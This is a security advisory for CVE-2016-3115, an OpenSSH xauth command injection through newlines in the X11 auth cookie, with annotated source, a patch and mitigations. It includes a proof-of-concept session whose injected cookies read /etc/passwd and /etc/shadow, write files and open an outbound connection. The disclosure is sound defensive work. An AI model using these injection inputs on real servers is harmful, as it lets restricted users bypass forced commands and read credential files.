Author: <github.com/tintinweb>
Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115
Version: 0.2
Date: Mar 3rd, 2016
Tag: openssh xauth command injection may lead to forced-command and /bin/false bypass
Name: openssh
Vendor: OpenBSD
References: * http://www.openssh.com/[1]
Version: 7.2p1 [2]
Latest Version: 7.2p1
Other Versions: <= 7.2p1 (all versions; dating back ~20 years)
Platform(s): linux
Technology: c
Vuln Classes: CWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection')
Origin: remote
Min. Privs.: post auth
CVE: CVE-2016-3115
quote website [1]
OpenSSH is the premier connectivity tool for remote login with the SSH protocol. It encrypts all traffic to eliminate eavesdropping, connection hijacking, and other attacks. In addition, OpenSSH provides a large suite of secure tunneling capabilities, several authentication methods, and sophisticated configuration options.
An authenticated user may inject arbitrary xauth commands by sending an
x11 channel request that includes a newline character in the x11 cookie.
The newline acts as a command separator to the xauth binary. This attack requires
the server to have X11Forwarding yes
enabled. Disabling it, mitigates this vector.
By injecting xauth commands one gains limited* read/write arbitrary files, information leakage or xauth-connect capabilities. These capabilities can be leveraged by an authenticated restricted user - e.g. one with the login shell configured as /bin/false or one with configured forced-commands - to bypass account restriction. This is generally not expected.
The injected xauth commands are performed with the effective permissions of the logged in user as the sshd already dropped its privileges.
Quick-Info:
Capabilities (xauth):
see attached PoC, Patch
// see annotated code below
* server_input_channel_req (serverloop.c)
*- session_input_channel_req:2299 (session.c [2])
*- session_x11_req:2181
* do_exec_pty or do_exec_no_pty
*- do_child
*- do_rc_files (session.c:1335 [2])
Upon receiving an x11-req
type channel request sshd parses the channel request
parameters auth_proto
and auth_data
from the client ssh packet where
auth_proto
contains the x11 authentication method used (e.g. MIT-MAGIC-COOKIE-1
)
and auth_data
contains the actual x11 auth cookie. This information is stored
in a session specific datastore. When calling execute
on that session, sshd will
call do_rc_files
which tries to figure out if this is an x11 call by evaluating
if auth_proto
and auth_data
(and display
) are set. If that is the case AND
there is no system /sshrc
existent on the server AND it no user-specific $HOME/.ssh/rc
is set, then do_rc_files
will run xauth -q -
and pass commands via stdin
.
Note that auth_data
nor auth_proto
was sanitized or validated, it just contains
user-tainted data. Since xauth
commands are passed via stdin
and \n
is a
command-separator to the xauth
binary, this allows a client to inject arbitrary
xauth
commands.
Sidenote #1: in case sshd takes the $HOME/.ssh/rc
branch, it will pass the tainted
input as arguments to that script.
Sidenote #2: client code also seems to not sanitize auth_data
, auth_proto
. [3]
This is an excerpt of the man xauth
[4] to outline the capabilities of this xauth
command injection:
SYNOPSIS
xauth [ -f authfile ] [ -vqibn ] [ command arg ... ]
add displayname protocolname hexkey
generate displayname protocolname [trusted|untrusted] [timeout seconds] [group group-id] [data hexdata]
[n]extract filename displayname...
[n]list [displayname...]
[n]merge [filename...]
remove displayname...
source filename
info
exit
quit
version
help
?
Interesting commands are:
info - leaks environment information / path
~# xauth info
xauth: file /root/.Xauthority does not exist
Authority file: /root/.Xauthority
File new: yes
File locked: no
Number of entries: 0
Changes honored: yes
Changes made: no
Current input: (argv):1
source - arbitrary file read (cut on first `\s`)
# xauth source /etc/shadow
xauth: file /root/.Xauthority does not exist
xauth: /etc/shadow:1: unknown command "smithj:Ep6mckrOLChF.:10063:0:99999:7:::"
extract - arbitrary file write
* limited characters
* in xauth.db format
* since it is not compressed it can be combined with `xauth add` to
first store data in the database and then export it to an arbitrary
location e.g. to plant a shell or do other things.
generate - connect to <ip>:<port> (port probing, connect back and pot. exploit
vulnerabilities in X.org
Inline annotations are prefixed with //#!
/*
* Run $HOME/.ssh/rc, /etc/ssh/sshrc, or xauth (whichever is found
* first in this order).
*/
static void
do_rc_files(Session *s, const char *shell)
{
...
snprintf(cmd, sizeof cmd, "%s -q -",
options.xauth_location);
f = popen(cmd, "w"); //#! run xauth -q -
if (f) {
fprintf(f, "remove %s\n", //#! remove <user_tainted_data> - injecting \n auth_display injects xauth command
s->auth_display);
fprintf(f, "add %s %s %s\n", //#! \n injection
s->auth_display, s->auth_proto,
s->auth_data);
pclose(f);
} else {
fprintf(stderr, "Could not run %s\n",
cmd);
}
}
}
Prerequisites:
#> pip install paramiko
to install paramiko
ssh library for python 2.xrun poc.py
Usage:
path_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key
poc:
force-commands
and another one with /bin/false
in /etc/passwd
:
#PUBKEY line - force commands: only allow "whoami"
#cat /home/user1/.ssh/authorized_keys
command="whoami" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user1@box
#cat /etc/passwd
user2:x:1001:1002:,,,:/home/user2:/bin/false
run sshd with X11Forwarding yes
(kali default config)
#> /root/openssh-7.2p1/sshd -p 22 -f sshd_config -D -d
forced-commands
- connect with user1 and display env information
#> python <host> 22 user1 .demoprivkey
INFO:__main__:add this line to your authorized_keys file:
#PUBKEY line - force commands: only allow "whoami"
#cat /home/user/.ssh/authorized_keys
command="whoami" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box
INFO:__main__:connecting to: user1:<PKEY>@host:22
INFO:__main__:connected!
INFO:__main__:
Available commands:
.info
.readfile <path>
.writefile <path> <data>
.exit .quit
<any xauth command or type help>
#> .info
DEBUG:__main__:auth_cookie: '\ninfo'
DEBUG:__main__:dummy exec returned: None
INFO:__main__:Authority file: /home/user1/.Xauthority
File new: no
File locked: no
Number of entries: 1
Changes honored: yes
Changes made: no
Current input: (stdin):3
/usr/bin/xauth: (stdin):2: bad "add" command line
...
forced-commands
- read /etc/passwd
...
#> .readfile /etc/passwd
DEBUG:__main__:auth_cookie: 'xxxx\nsource /etc/passwd\n'
DEBUG:__main__:dummy exec returned: None
INFO:__main__:root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
...
forced-commands
- write /tmp/testfile
#> .writefile /tmp/testfile `thisisatestfile`
DEBUG:__main__:auth_cookie: '\nadd 127.0.0.250:65500 `thisisatestfile` aa'
DEBUG:__main__:dummy exec returned: None
DEBUG:__main__:auth_cookie: '\nextract /tmp/testfile 127.0.0.250:65500'
DEBUG:__main__:dummy exec returned: None
DEBUG:__main__:/usr/bin/xauth: (stdin):2: bad "add" command line
#> ls -lsat /tmp/testfile
4 -rw------- 1 user1 user1 59 xx xx 13:49 /tmp/testfile
#> cat /tmp/testfile
ú65500hiú65500`thisisatestfile`ª
/bin/false
- connect and read /etc/passwd
#> python <host> 22 user2 user2password
INFO:__main__:connecting to: user2:user2password@host:22
INFO:__main__:connected!
INFO:__main__:
Available commands:
.info
.readfile <path>
.writefile <path> <data>
.exit .quit
<any xauth command or type help>
#> .readfile /etc/passwd
DEBUG:__main__:auth_cookie: 'xxxx\nsource /etc/passwd\n'
DEBUG:__main__:dummy exec returned: None
INFO:__main__:root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
...
user2:x:1001:1002:,,,:/home/user2:/bin/false
...
/bin/false
- initiate outbound X connection to 8.8.8.8:6100
#> generate 8.8.8.8:100 .
#> tcpdump
IP <host>.42033 > 8.8.8.8.6100: Flags [S], seq 1026029124, win 29200, options [mss 1460,sackOK,TS val 431416709 ecr 0,nop,wscale 10], length 0
Q: ImportError: No module named py3compat
A: outdated paramiko
please upgrade with pip install --upgrade paramiko
Sanitize user-tainted input s->auth_data
, s->auth_proto
, s->display
by replacing all non-printables by spaces. (I know this is kind of ugly ;))
#> ~/openssh-7.2p1# diff -u session.c session.c.patched
--- session.c 2016-02-17 11:32:11.616868923 -0500
+++ session.c.patched 2016-02-17 11:33:33.681596273 -0500
@@ -1327,6 +1327,18 @@
return env;
}
+char *
+sanitize_non_printable(char *s) {
+ char *ptr = s;
+ while (*ptr != '\0'){
+ if ((*ptr < 0x20)||(*s >= 0x7f )){ /* sanitizing \n would basically be enough */
+ *ptr = ' ';
+ }
+ ptr++;
+ }
+ return s;
+}
+
/*
* Run $HOME/.ssh/rc, /etc/ssh/sshrc, or xauth (whichever is found
* first in this order).
@@ -1341,6 +1353,9 @@
do_xauth =
s->display != NULL && s->auth_proto != NULL && s->auth_data != NULL;
+ sanitize_non_printable(s->display);
+ sanitize_non_printable(s->auth_proto);
+ sanitize_non_printable(s->auth_data);
/* ignore _PATH_SSH_USER_RC for subsystems and admin forced commands */
if (!s->is_subsystem && options.adm_forced_command == NULL &&
!no_user_rc && options.permit_user_rc &&
sshd_config
set X11Forwarding no
no-x11-forwarding
in authorized_keys
Verified, resolved and released within a few days. very impressive.
Vendor response: see advisory [5]
[1] http://www.openssh.com/
[2] https://github.com/openssh/openssh-portable/blob/5a0fcb77287342e2fc2ba1cee79b6af108973dc2/session.c#L1388
[3] https://github.com/openssh/openssh-portable/blob/19bcf2ea2d17413f2d9730dd2a19575ff86b9b6a/clientloop.c#L376
[4] http://linux.die.net/man/1/xauth
[5] http://www.openssh.com/txt/x11fwd.adv
https://github.com/tintinweb